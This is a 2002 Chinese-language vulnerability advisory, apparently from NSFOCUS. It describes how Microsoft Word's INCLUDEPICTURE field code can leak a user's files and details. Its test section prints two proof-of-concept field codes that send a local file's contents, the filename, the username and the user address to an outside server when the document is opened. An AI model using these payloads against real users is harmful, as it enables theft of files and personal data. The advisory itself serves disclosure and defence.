首页 -> 安全研究

安全研究

安全漏洞
Microsoft Word INCLUDEPICTURE文档共享远程文件泄露漏洞

发布日期:2002-09-20
更新日期:2002-09-24

受影响系统:
Microsoft Word 97 SR2
Microsoft Word 97 SR1
Microsoft Word 97
Microsoft Word 95
Microsoft Word 2002 SP1
Microsoft Word 2000 SR1a
Microsoft Word 2000 SR1
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
Microsoft Word 2002
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT 4.0 SP6
    - Microsoft Windows NT 4.0 SP5
    - Microsoft Windows NT 4.0 SP4
    - Microsoft Windows NT 4.0 SP3
    - Microsoft Windows NT 4.0 SP2
    - Microsoft Windows NT 4.0 SP1
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
描述:
BUGTRAQ  ID: 5764

Microsoft Word是一款流行的文字编辑软件。INCLUDEPICTURE字段代码用于包含图片,可以用来插入任意URL到文档中。

INCLUDEPICTURE字段代码存在安全问题,远程攻击者可以利用这个漏洞获取目标用户系统中的任意文件内容。

INCLUDEPICTURE字段代码可以包含在一个WORD文档中,并可以引用任意URL,当目标用户打开包含恶意构建的INCLUDEPICTURE字段代码的WORD文档时,通过不同的操作组合,可以导致获得目标用户系统中的文件位置,是否有人读取或者打印此文档,或者执行数学函数操作,用户系统信息和读取系统中任意文件内容。

要利用这个漏洞,攻击者可以通过构建WEB页面提供恶意WORD文档,并诱使有此漏洞的用户查看。

<*来源:Alex Gantman (agantman@qualcomm.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103252858816401&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Alex Gantman (agantman@qualcomm.com)提供了如下测试方法:

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { FILENAME \p } & { INCLUDETEXT "c:\\a.txt" } } \d }

{ INCLUDEPICTURE { QUOTE "http:\\www.alicesserver.com\" & { USERNAME } & { USERADDRESS } } \d }

用户也可能可以通过这些操作如:设置({SET})和获得({REF})变量,执行基本数学操作({=}),获取用户信息({USERNAME}, {USERADDRESS}),读取文件({INCLUDETEXT}, {INCLUDEPICTURE}),通过网络发送信息({INCLUDEPICTURE}),发送命令给打印机({PRINT})等等。不过没有得到证实。

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/technet/security/

浏览次数:3089
严重程度:5(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障